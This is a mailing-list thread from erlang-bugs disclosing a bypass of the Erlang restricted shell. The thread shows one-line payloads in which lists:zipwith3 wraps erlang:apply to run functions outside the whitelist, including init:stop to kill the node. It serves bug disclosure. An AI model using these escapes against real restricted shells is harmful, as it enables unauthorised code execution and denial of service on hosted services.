[erlang-bugs] The Erlang Restricted Shell allows execution of random commands

Tue Jan 31 14:38:11 CET 2012

Not really. In R16 you could do:

1> F = fun (M,F,A) -> lists:zipwith3(fun erlang:apply/3, [M], [F], [A]) end.
#Fun<erl_eval.18.59269574>
2> F(init, stop, []).
[ok]

*dies*

Regards,

Roberto Aloi
---
Erlang Solutions Ltd.
www.erlang-solutions.com

----- Original Message -----
> It sounds to work only with tuple funs, which is going to be removed
> soon anyway.
> 
> 
> OTP-9649 Tuple funs (a two-element tuple with a module name and a
> function) are now officially deprecated and will be removed
> in R16. Use 'fun M:F/A' instead. To make you aware that your
> system uses tuple funs, the very first time a tuple fun is
> applied, a warning will be sent to the error logger.
> 
> 
> 
> 1> F = fun (M,F,A) -> lists:zipwith3(fun(M, F,A)-> erlang:apply(M, F,
> A) end, [M], [F], [ A ]) end.
> #Fun<erl_eval.18.59269574>
> 2> F(erlang, time, []).
> ** exception exit: restricted shell does not allow time()
> in function shell:non_local_allowed/4
> in call from lists:zipwith3/4
> 3>
> 
> 
> or am i wrong?
> 
> 
> On Tue, Jan 31, 2012 at 12:46 PM, Roberto Aloi <
> roberto.aloi@REDACTED > wrote:
> 
> 
> Hi all,
> 
> reading from the Erlang doc:
> 
> http://www.erlang.org/doc/man/shell.html#start_restricted-1
> 
> "The shell may be started in a restricted mode. In this mode, the
> shell evaluates a function call only if allowed."
> 
> Let's write a minimal module which whitelists the 'lists' module
> only:
> 
> =====
> -module(restrict).
> 
> -export([local_allowed/3, non_local_allowed/3]).
> 
> -define(NON_LOCAL_ALLOWED, [lists]).
> 
> local_allowed(_Cmd, _Args, State) ->
> {false, State}.
> 
> non_local_allowed({Module, _Function}, _Args, State) ->
> {lists:member(Module, ?NON_LOCAL_ALLOWED), State}.
> =====
> 
> Let's then start a restricted shell, using the above module.
> 
> $ erlc restrict.erl
> $ erl -stdlib restricted_shell restrict
> 
> Erlang R14B04 (erts-5.8.5) [source] [64-bit] [smp:4:4] [rq:4]
> [async-threads:0] [hipe] [kernel-poll:false]
> 
> Restricted Eshell V5.8.5 (abort with ^G)
> 
> And let's see if it works as expected.
> 
> 1> erlang:time().
> ** exception exit: restricted shell does not allow time()
> 
> Cool.
> 
> 2> erlang:apply(erlang, time, []).
> ** exception exit: restricted shell does not allow time()
> 
> Yeah.
> 
> 3> F = fun (M,F,A) -> lists:zipwith3({erlang, apply}, [M], [F], [ A
> ]) end.
> #Fun<erl_eval.18.59269574>
> 4> F(erlang, time, []).
> [{12,35,45}]
> 
> Ooops.
> 
> Please notice that I'm not the one who actually discovered this bug
> (or is it a feature?). It was actually one of the tryerlang.org
> users, who kindly informed me about this. Originally I thought this
> was an application bug, but it is not. This is more generic and it
> affects the restricted shell itself.
> 
> Best regards,
> 
> Roberto Aloi
> ---
> @robertoaloi
> Erlang Solutions Ltd.
> www.erlang-solutions.com
> 
> _______________________________________________
> erlang-bugs mailing list
> erlang-bugs@REDACTED
> http://erlang.org/mailman/listinfo/erlang-bugs
> 
> 